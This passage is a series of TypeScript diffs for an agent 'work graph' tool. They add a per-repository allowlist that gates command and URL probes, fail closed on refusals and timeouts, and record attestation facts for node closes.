+
+  if (!isRecord(document)) return invalid("must be a JSON object");
+
+  const unknownKeys = Object.keys(document).filter((key) => key !== "version" && key !== "repos");
+  if (unknownKeys.length > 0) {
+    return invalid(`has unknown top-level key(s): ${unknownKeys.join(", ")} — expected only "version" and "repos"`);
+  }
+  if (document.version !== PROBE_REGISTRY_VERSION) {
+    return invalid(`must declare "version": ${PROBE_REGISTRY_VERSION} (found ${JSON.stringify(document.version)})`);
+  }
+  if (!isRecord(document.repos)) {
+    return invalid(`"repos" must be an object keyed by "owner/name"`);
+  }
+
+  const wanted = normalizeRepo(input.repo);
+  const seen = new Set<string>();
+  let match: RepoEntry | undefined;
+
+  for (const [key, value] of Object.entries(document.repos)) {
+    const normalized = normalizeRepo(key);
+    if (normalized.length === 0) return invalid(`"repos" has an empty repository key`);
+    if (seen.has(normalized)) {
+      return invalid(`"repos" declares ${normalized} more than once — repository keys are compared case-insensitively`);
+    }
+    seen.add(normalized);
+
+    const entry = parseRepoEntry(value, normalized, input.homeDir);
+    if ("error" in entry) return invalid(entry.error);
+    if (normalized === wanted) match = entry;
+  }
+
+  return {
+    status: "loaded",
+    repo: input.repo,
+    path: input.path,
+    commands: match?.commands ?? [],
+    urlHosts: match?.urlHosts ?? [],
+  };
+}
+
+interface RepoEntry {
+  commands: DeclaredCommand[];
+  urlHosts: string[];
+}
+
+function parseRepoEntry(value: unknown, repo: string, homeDir: string | undefined): RepoEntry | { error: string } {
+  if (!isRecord(value)) return { error: `repos["${repo}"] must be an object` };
+
+  const unknownKeys = Object.keys(value).filter((key) => key !== "commands" && key !== "urlHosts");
+  if (unknownKeys.length > 0) {
+    return {
+      error: `repos["${repo}"] has unknown key(s): ${unknownKeys.join(", ")} — expected only "commands" and "urlHosts"`,
+    };
+  }
+
+  const commands: DeclaredCommand[] = [];
+  if (value.commands !== undefined) {
+    if (!Array.isArray(value.commands)) return { error: `repos["${repo}"].commands must be an array` };
+    for (const [index, raw] of value.commands.entries()) {
+      const parsed = parseDeclaredCommand(raw, repo, index, homeDir);
+      if ("error" in parsed) return parsed;
+      commands.push(parsed.command);
+    }
+  }
+
+  const urlHosts: string[] = [];
+  if (value.urlHosts !== undefined) {
+    if (!Array.isArray(value.urlHosts)) return { error: `repos["${repo}"].urlHosts must be an array` };
+    for (const [index, raw] of value.urlHosts.entries()) {
+      const parsed = parseDeclaredHost(raw, repo, index);
+      if ("error" in parsed) return parsed;
+      urlHosts.push(parsed.host);
+    }
+  }
+
+  return { commands, urlHosts };
+}
+
+function parseDeclaredCommand(
+  raw: unknown,
+  repo: string,
+  index: number,
+  homeDir: string | undefined,
+): { command: DeclaredCommand } | { error: string } {
+  const where = `repos["${repo}"].commands[${index}]`;
+  if (!isRecord(raw)) return { error: `${where} must be an object with "run" and "cwd"` };
+
+  const unknownKeys = Object.keys(raw).filter((key) => key !== "run" && key !== "cwd");
+  if (unknownKeys.length > 0) {
+    return { error: `${where} has unknown key(s): ${unknownKeys.join(", ")} — expected only "run" and "cwd"` };
+  }
+
+  const { run, cwd } = raw;
+  if (typeof run !== "string" || run.length === 0) return { error: `${where}.run must be a non-empty string` };
+  if (typeof cwd !== "string" || cwd.length === 0) return { error: `${where}.cwd must be a non-empty string` };
+
+  const expanded = expandTilde(cwd, homeDir);
+  if (!isAbsolute(expanded)) {
+    // A relative declaration would authorise a *different* directory depending
+    // on where the close was invoked from — which is the exact substitution
+    // `cwd`-in-the-match exists to prevent.
+    return { error: `${where}.cwd must be an absolute path (got ${JSON.stringify(cwd)})` };
+  }
+
+  return { command: { run, cwd: resolve(expanded) } };
+}
+
+function parseDeclaredHost(raw: unknown, repo: string, index: number): { host: string } | { error: string } {
+  const where = `repos["${repo}"].urlHosts[${index}]`;
+  if (typeof raw !== "string" || raw.trim().length === 0) {
+    return { error: `${where} must be a non-empty string` };
+  }
+
+  const host = raw.trim().toLowerCase();
+  if (host.includes("*")) {
+    // Rejected explicitly rather than left to never match: an adopter who writes
+    // `*` means "any host", and a declaration that silently authorises nothing
+    // reads as a working wildcard until a close mysteriously refuses.
+    return { error: `${where} may not contain "*" — the host set is exact, with no wildcards` };
+  }
+
+  const normalized = normalizeHost(host);
+  if (normalized === undefined || normalized !== host) {
+    return {
+      error: `${where} must be a bare hostname — no scheme, port, path, or credentials (got ${JSON.stringify(raw)})`,
+    };
+  }
+
+  return { host: normalized };
+}
+
+// ---------------------------------------------------------------------------
+// Authorisation
+// ---------------------------------------------------------------------------
+
+/**
+ * The gate. `resolvedCwd` is the directory the runner would actually execute in
+ * — already resolved against the runner's base cwd — because that, not the
+ * literal `cwd` field on the node, is what the match has to be about.
+ *
+ * The switch is exhaustive on purpose: a probe type added later cannot inherit
+ * "ungated" by omission, it has to be classified here (DD-16 Amendment A's
+ * recorded limit — the three argv probes are ungated *because* they are argv and
+ * read-only today).
+ */
+export function authorizeProbe(
+  probe: Probe,
+  resolvedCwd: string,
+  registry: ProbeRegistry | undefined,
+): ProbeAuthorization {
+  switch (probe.type) {
+    case "git-ref-exists":
+    case "git-merged-into":
+    case "artifact-exists":
+      return { allowed: true };
+    case "command":
+      return authorizeCommand(probe.run, resolvedCwd, registry);
+    case "url":
+      return authorizeUrl(probe.target, registry);
+  }
+}
+
+function authorizeCommand(run: string, resolvedCwd: string, registry: ProbeRegistry | undefined): ProbeAuthorization {
+  const snippet = `{"run": ${JSON.stringify(abbreviate(run))}, "cwd": ${JSON.stringify(resolvedCwd)}}`;
+  if (registry?.status !== "loaded") {
+    return gateUnavailable(registry, "command", snippet);
+  }
+
+  const declared = registry.commands.some((entry) => entry.run === run && entry.cwd === resolvedCwd);
+  if (declared) return { allowed: true };
+
+  return refuse(
+    [
+      `\`${abbreviate(run)}\` in ${resolvedCwd} is not declared for ${registry.repo}`,
+      `(${registry.commands.length} command(s) declared in ${registry.path}).`,
+      `The match is exact on both \`run\` and \`cwd\`. To allow it, add under repos["${registry.repo}"].commands:`,
+      snippet,
+    ].join("\n"),
+  );
+}
+
+function authorizeUrl(target: string, registry: ProbeRegistry | undefined): ProbeAuthorization {
+  if (registry?.status !== "loaded") {
+    return gateUnavailable(registry, "url", undefined);
+  }
+
+  let parsed: URL;
+  try {
+    parsed = new URL(target);
+  } catch {
+    return refuse(`target \`${abbreviate(target)}\` is not a parsable URL.`);
+  }
+
+  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
+    // Falls out of the host rule rather than extending it: a `file:` or `data:`
+    // target has no host for a host set to authorise. Said explicitly because
+    // "host `` is not declared" is a useless thing to read.
+    return refuse(
+      `target \`${abbreviate(target)}\` is not an http(s) URL — the registry declares hosts, and only http and https targets have one.`,
+    );
+  }
+
+  const host = parsed.hostname.toLowerCase();
+  if (registry.urlHosts.includes(host)) return { allowed: true };
+
+  return refuse(
+    [
+      `host \`${abbreviate(host)}\` is not declared for ${registry.repo}`,
+      `(${registry.urlHosts.length} host(s) declared in ${registry.path}).`,
+      `To allow it, add ${JSON.stringify(host)} under repos["${registry.repo}"].urlHosts.`,
+    ].join("\n"),
+  );
+}
+
+/** The registry states that refuse every gated probe, whatever the probe says. */
+function gateUnavailable(
+  registry: Exclude<ProbeRegistry, { status: "loaded" }> | undefined,
+  probeType: "command" | "url",
+  snippet: string | undefined,
+): ProbeAuthorization {
+  if (registry === undefined) {
+    return refuse(`\`${probeType}\` probes are gated and the probe runner was given no registry.`);
+  }
+
+  if (registry.status === "absent") {
+    return refuse(
+      [
+        `\`${probeType}\` probes are gated and no registry exists at ${registry.path}.`,
+        `A machine with no declaration refuses these closes. Create the file for ${registry.repo}:`,
+        renderStarterDocument(registry.repo, snippet),
+      ].join("\n"),
+    );
+  }
+
+  return refuse(
+    [
+      `the registry at ${registry.path} is unusable — it ${registry.reason}.`,
+      `Every \`command\` and \`url\` probe is refused until the document parses.`,
+    ].join("\n"),
+  );
+}
+
+function renderStarterDocument(repo: string, commandSnippet: string | undefined): string {
+  const commands = commandSnippet === undefined ? "" : `\n        ${commandSnippet}\n      `;
+  return [
+    `{`,
+    `  "version": ${PROBE_REGISTRY_VERSION},`,
+    `  "repos": {`,
+    `    ${JSON.stringify(repo)}: {`,
+    `      "commands": [${commands}],`,
+    `      "urlHosts": []`,
+    `    }`,
+    `  }`,
+    `}`,
+  ].join("\n");
+}
+
+function refuse(reason: string): ProbeAuthorization {
+  return { allowed: false, reason: `${PROBE_REFUSED_PREFIX} ${reason}` };
+}
+
+/**
+ * Did this probe fail because the gate refused it, rather than because it ran
+ * and failed? Callers need the distinction to point the adopter at the registry;
+ * `assertClosable` deliberately does not, since both are simply "not passed".
+ */
+export function isProbeRefusal(result: ProbeResult): boolean {
+  return result.state === "probed" && result.outcome === "fail" && result.observed.startsWith(PROBE_REFUSED_PREFIX);
+}
+
+// ---------------------------------------------------------------------------
+// Small helpers
+// ---------------------------------------------------------------------------
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}
+
+function normalizeRepo(repo: string): string {
+  return repo.trim().toLowerCase();
+}
+
+/** `example.com` → `example.com`; anything carrying a scheme, port, path or userinfo → `undefined`. */
+function normalizeHost(host: string): string | undefined {
+  try {
+    return new URL(`http://${host}`).hostname.toLowerCase();
+  } catch {
+    return undefined;
+  }
+}
+
+function expandTilde(path: string, homeDir: string | undefined): string {
+  if (path !== "~" && !path.startsWith("~/")) return path;
+  return join(resolve(homeDir ?? homedir()), path.slice(1));
+}
+
+/** Refusal messages quote tracker content; a node author does not get to choose how much. */
+function abbreviate(text: string, limit = ECHO_LIMIT): string {
+  return text.length <= limit ? text : `${text.slice(0, limit)}… (truncated — copy the exact value from the node block)`;
+}
+
+function describe(error: unknown): string {
+  return error instanceof Error ? error.message : String(error);
+}

--- a/src/work-graph-probes.ts
+++ b/src/work-graph-probes.ts
@@ -7,7 +7,7 @@
  * hollow, so evidence is typed by whether it was specified first and then
  * actually run, never by what a session says about it afterwards.
  *
- * Two rules the spec puts on the runner specifically:
+ * Three rules the spec puts on the runner specifically:
  *
  * - **Timeout expiry is probe failure**, never a hang and never a pass — a
  *   hanging command must not block the close path.
@@ -16,6 +16,10 @@
  *   with the reason in `observed`, so {@link assertClosable} refuses the close.
  *   Fail-closed: the one thing a runner may never do is let an unrun probe look
  *   like a passed one.
+ * - **A probe the registry refuses is a failure too** (DD-16 Amendment A,
+ *   #526) — same shape, same path, deliberately not a new outcome: "the
+ *   adopter never authorised this command" and "this command failed" are both
+ *   simply *not passed*, and the close gate already knows what to do with that.
  *
  * I/O sits behind {@link ProbeRunnerDeps} so the whole runner is testable
  * without a shell, a network, or a git tree.
@@ -23,6 +27,7 @@
 
 import { existsSync } from "node:fs";
 import { resolve } from "node:path";
+import { authorizeProbe, type ProbeRegistry } from "./work-graph-probe-registry";
 import type { Probe, ProbeResult } from "./work-graph";
 
 /** How much of a command's output survives into the receipt (§2.2: a *bounded* tail). */
@@ -64,6 +69,14 @@ export interface ProbeRunnerDeps {
 export interface ProbeRunnerOptions {
   /** Default working directory for probes that do not name one. */
   cwd?: string;
+  /**
+   * The adopter's probe registry for the repo this graph lives in (§2.2, DD-16
+   * Amendment A). **Absent means refuse**: every `command` and `url` probe fails
+   * closed, which is the spec's rule for a machine carrying no declaration.
+   * Deliberately not defaulted to a permissive value — a gate you can forget to
+   * pass is not a gate.
+   */
+  registry?: ProbeRegistry;
   deps?: Partial<ProbeRunnerDeps>;
 }
 
@@ -179,6 +192,17 @@ export async function runProbe(probe: Probe, options: ProbeRunnerOptions = {}): 
   const at = deps.now().toISOString();
 
   try {
+    // The gate runs before dispatch, not inside the two gated cases, so a probe
+    // type added later cannot slip past by forgetting to call it.
+    const authorization = authorizeProbe(
+      probe,
+      probe.type === "command" ? probeCwd(probe.cwd, baseCwd) : baseCwd,
+      options.registry,
+    );
+    if (!authorization.allowed) {
+      return probed(probe, "fail", authorization.reason, at);
+    }
+
     switch (probe.type) {
       case "command": {
         const outcome = await deps.runCommand({

--- a/src/work-graph-probes.ts
+++ b/src/work-graph-probes.ts
@@ -1,0 +1,267 @@
+/**
+ * Probe runner for the work graph (`docs/work-graph.md` §2.2, #498).
+ *
+ * A {@link Probe} is a machine-checkable expectation *declared up front*; this
+ * module is what flips it from `specified` to `probed`. That split is the whole
+ * point — the algorithm-runner P1 lesson is that self-declared verification is
+ * hollow, so evidence is typed by whether it was specified first and then
+ * actually run, never by what a session says about it afterwards.
+ *
+ * Two rules the spec puts on the runner specifically:
+ *
+ * - **Timeout expiry is probe failure**, never a hang and never a pass — a
+ *   hanging command must not block the close path.
+ * - **A runner error is a failure, not an exception.** A probe that could not be
+ *   executed (network refused, git missing, bad path) records `outcome: "fail"`
+ *   with the reason in `observed`, so {@link assertClosable} refuses the close.
+ *   Fail-closed: the one thing a runner may never do is let an unrun probe look
+ *   like a passed one.
+ *
+ * I/O sits behind {@link ProbeRunnerDeps} so the whole runner is testable
+ * without a shell, a network, or a git tree.
+ */
+
+import { existsSync } from "node:fs";
+import { resolve } from "node:path";
+import type { Probe, ProbeResult } from "./work-graph";
+
+/** How much of a command's output survives into the receipt (§2.2: a *bounded* tail). */
+const OBSERVED_TAIL_LIMIT = 1_200;
+
+/** Git probes carry no `timeoutSec` of their own; local plumbing that outruns this is broken, not slow. */
+const GIT_TIMEOUT_SEC = 60;
+
+export interface CommandOutcome {
+  /** Null when the process was killed before reporting a code (timeout, signal). */
+  exitCode: number | null;
+  stdout: string;
+  stderr: string;
+  timedOut: boolean;
+}
+
+export interface CommandRequest {
+  /** Argv form — used for git plumbing, where a shell would let a ref name inject. */
+  argv?: readonly string[];
+  /** Shell form — the `command` probe's `run` string, as declared. */
+  shell?: string;
+  cwd?: string;
+  timeoutSec: number;
+  /**
+   * Full replacement environment. Absent means inherit. The confinement check
+   * (§3.2 conjunct 2) needs to run `gh` with `GH_TOKEN` *removed*, which is a
+   * different thing from setting it empty — hence a whole map, not an overlay.
+   */
+  env?: Readonly<Record<string, string>>;
+}
+
+export interface ProbeRunnerDeps {
+  runCommand: (request: CommandRequest) => Promise<CommandOutcome>;
+  fetchStatus: (target: string) => Promise<number>;
+  pathExists: (path: string) => boolean;
+  now: () => Date;
+}
+
+export interface ProbeRunnerOptions {
+  /** Default working directory for probes that do not name one. */
+  cwd?: string;
+  deps?: Partial<ProbeRunnerDeps>;
+}
+
+/** Keep the tail — the end of a failing command's output is where the reason is. */
+export function boundObserved(text: string, limit = OBSERVED_TAIL_LIMIT): string {
+  const collapsed = text.replace(/\s+$/u, "");
+  if (collapsed.length <= limit) return collapsed;
+  return `…${collapsed.slice(collapsed.length - limit)}`;
+}
+
+/**
+ * The default command seam, exported because the verb layer needs the same one
+ * for `gh` lookups and the confinement check — one place that knows how a
+ * subprocess is spawned, timed out, and captured.
+ */
+export function runCommand(request: CommandRequest): Promise<CommandOutcome> {
+  const argv =
+    request.argv !== undefined
+      ? [...request.argv]
+      : process.platform === "win32"
+        ? ["cmd", "/c", request.shell ?? ""]
+        : ["/bin/sh", "-c", request.shell ?? ""];
+
+  return runSpawned(argv, request);
+}
+
+async function runSpawned(argv: string[], request: CommandRequest): Promise<CommandOutcome> {
+  const proc = Bun.spawn(argv, {
+    stdin: "ignore",
+    stdout: "pipe",
+    stderr: "pipe",
+    ...(request.cwd === undefined ? {} : { cwd: request.cwd }),
+    ...(request.env === undefined ? {} : { env: request.env }),
+  });
+
+  // A holder rather than a bare `let`: the flag is written from the timer
+  // callback, which control-flow analysis cannot see.
+  const timeout: { fired: boolean } = { fired: false };
+  const timer = setTimeout(() => {
+    timeout.fired = true;
+    proc.kill("SIGKILL");
+  }, request.timeoutSec * 1_000);
+
+  try {
+    const [stdout, stderr, exitCode] = await Promise.all([
+      new Response(proc.stdout).text(),
+      new Response(proc.stderr).text(),
+      proc.exited,
+    ]);
+    return {
+      exitCode: timeout.fired ? null : exitCode,
+      stdout,
+      stderr,
+      timedOut: timeout.fired,
+    };
+  } finally {
+    clearTimeout(timer);
+  }
+}
+
+async function defaultFetchStatus(target: string): Promise<number> {
+  const response = await fetch(target, { redirect: "manual" });
+  return response.status;
+}
+
+function resolveDeps(options: ProbeRunnerOptions): ProbeRunnerDeps {
+  return {
+    runCommand: options.deps?.runCommand ?? runCommand,
+    fetchStatus: options.deps?.fetchStatus ?? defaultFetchStatus,
+    pathExists: options.deps?.pathExists ?? existsSync,
+    now: options.deps?.now ?? ((): Date => new Date()),
+  };
+}
+
+function probed(probe: Probe, outcome: "pass" | "fail", observed: string, at: string): ProbeResult {
+  return { probe, state: "probed", outcome, observed, at };
+}
+
+/** Command outcome → the `observed` string §2.2 asks for: exit code plus a bounded output tail. */
+function describeCommand(outcome: CommandOutcome, timeoutSec: number): string {
+  if (outcome.timedOut) {
+    return `timed out after ${timeoutSec}s (killed)`;
+  }
+  const tail = boundObserved([outcome.stdout, outcome.stderr].filter((part) => part.trim().length > 0).join("\n"));
+  return tail.length === 0 ? `exit ${outcome.exitCode}` : `exit ${outcome.exitCode}: ${tail}`;
+}
+
+async function runGit(
+  deps: ProbeRunnerDeps,
+  cwd: string,
+  args: readonly string[],
+): Promise<CommandOutcome> {
+  return await deps.runCommand({ argv: ["git", "-C", cwd, ...args], timeoutSec: GIT_TIMEOUT_SEC });
+}
+
+/**
+ * `repo` on the git/artifact probes is a **local working tree path**, defaulting
+ * to the runner's cwd — the reading `artifact-exists`'s `path` + `atRef` pair
+ * forces (`git cat-file -e <atRef>:<path>` needs a checkout, not an API).
+ */
+function probeCwd(probeRepo: string | undefined, fallbackCwd: string): string {
+  return probeRepo === undefined ? fallbackCwd : resolve(fallbackCwd, probeRepo);
+}
+
+/**
+ * Run one probe. Always resolves to a `probed` result — pass or fail — because a
+ * probe that throws is a probe that did not pass, and the close gate needs that
+ * as data, not as an exception to interpret.
+ */
+export async function runProbe(probe: Probe, options: ProbeRunnerOptions = {}): Promise<ProbeResult> {
+  const deps = resolveDeps(options);
+  const baseCwd = options.cwd ?? process.cwd();
+  const at = deps.now().toISOString();
+
+  try {
+    switch (probe.type) {
+      case "command": {
+        const outcome = await deps.runCommand({
+          shell: probe.run,
+          cwd: probeCwd(probe.cwd, baseCwd),
+          timeoutSec: probe.timeoutSec,
+        });
+        const passed = !outcome.timedOut && outcome.exitCode === probe.expectExit;
+        const observed = describeCommand(outcome, probe.timeoutSec);
+        return probed(probe, passed ? "pass" : "fail", passed ? observed : `${observed} (expected exit ${probe.expectExit})`, at);
+      }
+
+      case "url": {
+        const status = await deps.fetchStatus(probe.target);
+        const passed = status === probe.expectStatus;
+        return probed(probe, passed ? "pass" : "fail", `status ${status}${passed ? "" : ` (expected ${probe.expectStatus})`}`, at);
+      }
+
+      case "git-ref-exists": {
+        const cwd = probeCwd(probe.repo, baseCwd);
+        const outcome = await runGit(deps, cwd, ["rev-parse", "--verify", "--quiet", `${probe.ref}^{commit}`]);
+        const sha = outcome.stdout.trim();
+        const passed = outcome.exitCode === 0 && sha.length > 0;
+        return probed(probe, passed ? "pass" : "fail", passed ? `${probe.ref} → ${sha}` : `${probe.ref} does not resolve in ${cwd}`, at);
+      }
+
+      case "git-merged-into": {
+        const cwd = probeCwd(probe.repo, baseCwd);
+        const resolved = await runGit(deps, cwd, ["rev-parse", "--verify", "--quiet", `${probe.ref}^{commit}`]);
+        const sha = resolved.stdout.trim();
+        if (resolved.exitCode !== 0 || sha.length === 0) {
+          return probed(probe, "fail", `${probe.ref} does not resolve in ${cwd}`, at);
+        }
+        const ancestor = await runGit(deps, cwd, ["merge-base", "--is-ancestor", probe.ref, probe.into]);
+        const passed = ancestor.exitCode === 0;
+        return probed(
+          probe,
+          passed ? "pass" : "fail",
+          `${probe.ref} (${sha}) ${passed ? "is" : "is not"} an ancestor of ${probe.into}`,
+          at,
+        );
+      }
+
+      case "artifact-exists": {
+        const cwd = probeCwd(probe.repo, baseCwd);
+        if (probe.atRef === undefined) {
+          const full = resolve(cwd, probe.path);
+          const passed = deps.pathExists(full);
+          return probed(probe, passed ? "pass" : "fail", `${full} ${passed ? "exists" : "is absent"}`, at);
+        }
+        const outcome = await runGit(deps, cwd, ["cat-file", "-e", `${probe.atRef}:${probe.path}`]);
+        const passed = outcome.exitCode === 0;
+        return probed(
+          probe,
+          passed ? "pass" : "fail",
+          `${probe.path} ${passed ? "present" : "absent"} at ${probe.atRef}`,
+          at,
+        );
+      }
+    }
+  } catch (error) {
+    // Fail-closed: an unrunnable probe is a failed probe, never a skipped one.
+    return probed(probe, "fail", `probe runner error: ${error instanceof Error ? error.message : String(error)}`, at);
+  }
+}
+
+/**
+ * Run every declared probe, in order. Sequential on purpose: probes are commands
+ * against a shared working tree, and a parallel run would make their outcomes
+ * depend on each other's side effects.
+ */
+export async function runProbes(
+  probes: readonly Probe[],
+  options: ProbeRunnerOptions = {},
+): Promise<ProbeResult[]> {
+  const results: ProbeResult[] = [];
+  for (const probe of probes) {
+    results.push(await runProbe(probe, options));
+  }
+  return results;
+}
+
+/** Did every declared probe run *and* pass? The close gate's machine-checkable half (§3.1). */
+export function allProbesPassed(results: readonly ProbeResult[]): boolean {
+  return results.every((result) => result.state === "probed" && result.outcome === "pass");
+}

--- a/src/work-graph-probes.ts
+++ b/src/work-graph-probes.ts
@@ -36,6 +36,9 @@ const OBSERVED_TAIL_LIMIT = 1_200;
 /** Git probes carry no `timeoutSec` of their own; local plumbing that outruns this is broken, not slow. */
 const GIT_TIMEOUT_SEC = 60;
 
+/** Nor do `url` probes (§2.2 fixes their shape), and an unbounded fetch would hang the close. */
+const URL_TIMEOUT_SEC = 30;
+
 export interface CommandOutcome {
   /** Null when the process was killed before reporting a code (timeout, signal). */
   exitCode: number | null;
@@ -137,8 +140,19 @@ async function runSpawned(argv: string[], request: CommandRequest): Promise<Comm
   }
 }
 
+/**
+ * `url` probes carry no `timeoutSec` of their own — §2.2 fixes the shape as
+ * `{ target, expectStatus }` — so the bound lives here. Without it "timeout
+ * expiry is failure, never a hang" would simply be false for this variant: a
+ * server that accepts the connection and never answers would block the close
+ * indefinitely. An aborted fetch throws, and {@link runProbe} turns a throw into
+ * a failed probe, so the fail-closed path is the one already in place.
+ */
 async function defaultFetchStatus(target: string): Promise<number> {
-  const response = await fetch(target, { redirect: "manual" });
+  const response = await fetch(target, {
+    redirect: "manual",
+    signal: AbortSignal.timeout(URL_TIMEOUT_SEC * 1_000),
+  });
   return response.status;
 }
 

--- a/src/work-graph-probes.ts
+++ b/src/work-graph-probes.ts
@@ -192,13 +192,15 @@ export async function runProbe(probe: Probe, options: ProbeRunnerOptions = {}): 
   const at = deps.now().toISOString();
 
   try {
+    // One directory, computed once, used by both the gate and the spawn. The
+    // registry's exact-match guarantee is only worth anything while "the cwd we
+    // authorised" and "the cwd we executed in" are the same value — two
+    // equivalent expressions would hold today and drift silently tomorrow.
+    const resolvedCwd = probe.type === "command" ? probeCwd(probe.cwd, baseCwd) : baseCwd;
+
     // The gate runs before dispatch, not inside the two gated cases, so a probe
     // type added later cannot slip past by forgetting to call it.
-    const authorization = authorizeProbe(
-      probe,
-      probe.type === "command" ? probeCwd(probe.cwd, baseCwd) : baseCwd,
-      options.registry,
-    );
+    const authorization = authorizeProbe(probe, resolvedCwd, options.registry);
     if (!authorization.allowed) {
       return probed(probe, "fail", authorization.reason, at);
     }
@@ -207,7 +209,7 @@ export async function runProbe(probe: Probe, options: ProbeRunnerOptions = {}): 
       case "command": {
         const outcome = await deps.runCommand({
           shell: probe.run,
-          cwd: probeCwd(probe.cwd, baseCwd),
+          cwd: resolvedCwd,
           timeoutSec: probe.timeoutSec,
         });
         const passed = !outcome.timedOut && outcome.exitCode === probe.expectExit;

--- a/src/work-graph.ts
+++ b/src/work-graph.ts
@@ -207,16 +207,30 @@ export type AttestationCapability = "verifiable" | "unverified";
  * Populated by the verb layer, which owns the derivation rule (#498, gated on
  * #502). The contract layer stores and renders it.
  */
+/** One line of the confinement check's probe set (§3.2: probe set, result, and timestamp — not just a verdict). */
+export interface ConfinementProbeRecord {
+  name: string;
+  observed: string;
+}
+
 export interface AttestationFacts {
   backendCapability: AttestationCapability;
   confinement?: {
     checked: boolean;
     reachableIdentities: readonly string[];
     at: string;
+    probes?: readonly ConfinementProbeRecord[];
   };
   proposal?: { commentId: string; author: string };
   ratification?: { kind: "reaction" | "comment"; id: string; author: string };
   root?: { nodeId: string; author: string };
+  /**
+   * Why the verdict came out as it did, one line per failed conjunct — empty on
+   * `verified`. The facts above are what a re-audit re-judges; these say which
+   * remediation the reader needs, since a wrong ratifier and a reachable keyring
+   * look identical in the verdict and are fixed differently.
+   */
+  reasons?: readonly string[];
 }
 
 export interface CloseReceipt {
@@ -252,6 +266,15 @@ export interface GraphStore {
   /** Assigns, then re-reads (no compare-and-swap exists on GitHub) and applies {@link resolveClaimRace}. */
   claim(ref: NodeRef, identity: string): Promise<ClaimResult>;
   postComment(ref: NodeRef, body: string): Promise<CommentRef>;
+  /**
+   * Re-read a comment for its API author field. The HITL close path needs the
+   * *proposal's* author to evaluate §3.2 conjunct 3, and the two-phase close
+   * spans two process invocations — so the author has to come back from the
+   * backend rather than be carried on the command line, where it would be
+   * caller-authored and therefore exactly the evidence class the conjunct
+   * rejects. (Seam addendum, same class as `CreateNodeSpec.body`/`parent` on #497.)
+   */
+  readComment(ref: CommentRef): Promise<CommentRef>;
   readCommentReactions(ref: CommentRef): Promise<Reaction[]>;
   close(ref: NodeRef, receipt: CloseReceipt): Promise<void>;
 }
@@ -721,6 +744,10 @@ export class WorkGraph {
 
   async postComment(ref: NodeRef, body: string): Promise<CommentRef> {
     return await this.store.postComment(ref, body);
+  }
+
+  async readComment(ref: CommentRef): Promise<CommentRef> {
+    return await this.store.readComment(ref);
   }
 
   async readCommentReactions(ref: CommentRef): Promise<Reaction[]> {

--- a/src/work-graph.ts
+++ b/src/work-graph.ts
@@ -1,0 +1,743 @@
+/**
+ * Work graph — typed contracts (`docs/work-graph.md` §2, DD-16, map #495 / #497).
+ *
+ * The work graph is Soma's typed primitive for cross-session effort topology:
+ * nodes of work joined by blocking edges, walked by agent sessions, closed only
+ * through checkpoint gates.
+ *
+ * Layering, per spec §2.5:
+ *
+ * - {@link GraphStore} is the **I/O port** — one implementation per backend
+ *   (day-one: GitHub, in `./work-graph-github`).
+ * - {@link WorkGraph} is the **contract layer** over any store: creation
+ *   validation, DAG/cycle rejection, frontier confirmation, claim semantics,
+ *   close gating. A second backend inherits every rule for free.
+ *
+ * Everything crossing the store boundary is parsed, never cast: §2.1 makes
+ * `createNode` validation the authoritative barrier ("JSON/store-returned data
+ * is never trusted by cast"), because the TS tuple type only guards literal
+ * construction sites.
+ */
+
+import type { EvidenceKind } from "./types";
+
+/**
+ * The only classification the runtime enforces (#485). The work-kind vocabulary
+ * (research / prototype / grilling / task) is doctrine owned by consumers such
+ * as the orienteer skill, and rides on {@link WorkGraphNodeBase.kind}.
+ */
+export type WorkGraphAutonomy = "auto" | "propose" | "approve";
+
+/** Deterministic circuit breaker (§3.3) — a cap read at claim/execution time, not a scheduler. */
+export interface NodeBudget {
+  tokens?: number;
+  agentInvocations?: number;
+  wallClockMin?: number;
+}
+
+/**
+ * A machine-checkable expectation (§2.2). Prose probes are `judged` evidence in
+ * disguise (#492 correction 1), so there is no free-text variant. `type` alone
+ * is the runner's dispatch key — one switch, no nested discriminants.
+ */
+export type Probe =
+  | { type: "command"; run: string; cwd?: string; timeoutSec: number; expectExit: number }
+  | { type: "url"; target: string; expectStatus: number }
+  | { type: "git-ref-exists"; ref: string; repo?: string }
+  | { type: "git-merged-into"; ref: string; into: string; repo?: string }
+  | { type: "artifact-exists"; path: string; atRef?: string; repo?: string };
+
+export type ProbeType = Probe["type"];
+
+/**
+ * Evidence typed by whether it was *specified up front* and then *actually
+ * probed* — the algorithm-runner P1 lesson (self-declared verification is
+ * hollow). `state` never flips to `probed` without recorded output.
+ */
+export type ProbeResult =
+  | { probe: Probe; state: "specified" }
+  | {
+      probe: Probe;
+      state: "probed";
+      /** ran-and-passed vs ran-and-failed — close requires every probe probed AND passed. */
+      outcome: "pass" | "fail";
+      /** command: exit code + bounded output tail; url: status; git/artifact: resolved sha / path presence. */
+      observed: string;
+      /** ISO timestamp of execution. */
+      at: string;
+    };
+
+export interface WorkGraphNodeBase {
+  /** Backend-native identity (GitHub: issue number), assigned by the store — never caller-supplied. */
+  id: string;
+  title: string;
+  /**
+   * Free-form doctrine tag (e.g. research, grilling). The runtime never
+   * interprets its MEANING but normalizes its FORM at the store boundary:
+   * absent is accepted; present is stored trimmed + lowercased, and rejected
+   * if it trims to empty.
+   */
+  kind?: string;
+  /**
+   * The checkpoint whose completion gate closes this node. May attach after
+   * creation, but close REFUSES while it is absent — the required-by-close
+   * invariant, enforced in {@link assertClosable}.
+   */
+  checkpointId?: string;
+  budget?: NodeBudget;
+}
+
+/**
+ * The tuple type on `auto` guards TS literal-construction sites only; the
+ * authoritative barrier is {@link parseNodeSpec} at the store boundary. Zero
+ * probes on an `auto` node would mean zero machine-checkable evidence at close
+ * (§1 clause 1).
+ */
+export type WorkGraphNode =
+  | (WorkGraphNodeBase & { autonomy: "auto"; probes: [Probe, ...Probe[]] })
+  | (WorkGraphNodeBase & { autonomy: "propose" | "approve"; probes?: Probe[] });
+
+/** `Omit` over a union collapses it; this preserves the `auto` ⇒ non-empty-probes discrimination. */
+type DistributiveOmit<T, K extends PropertyKey> = T extends unknown ? Omit<T, K> : never;
+
+/** Opaque handle to a node — backend-native id, the shape callers pass around. */
+export interface NodeRef {
+  id: string;
+}
+
+/**
+ * What `createNode` accepts: the node minus its store-assigned id, plus the two
+ * fields a *creation* needs that a node does not carry (spec §2.5 leaves the
+ * store-facing types open; see the addendum note on #497):
+ *
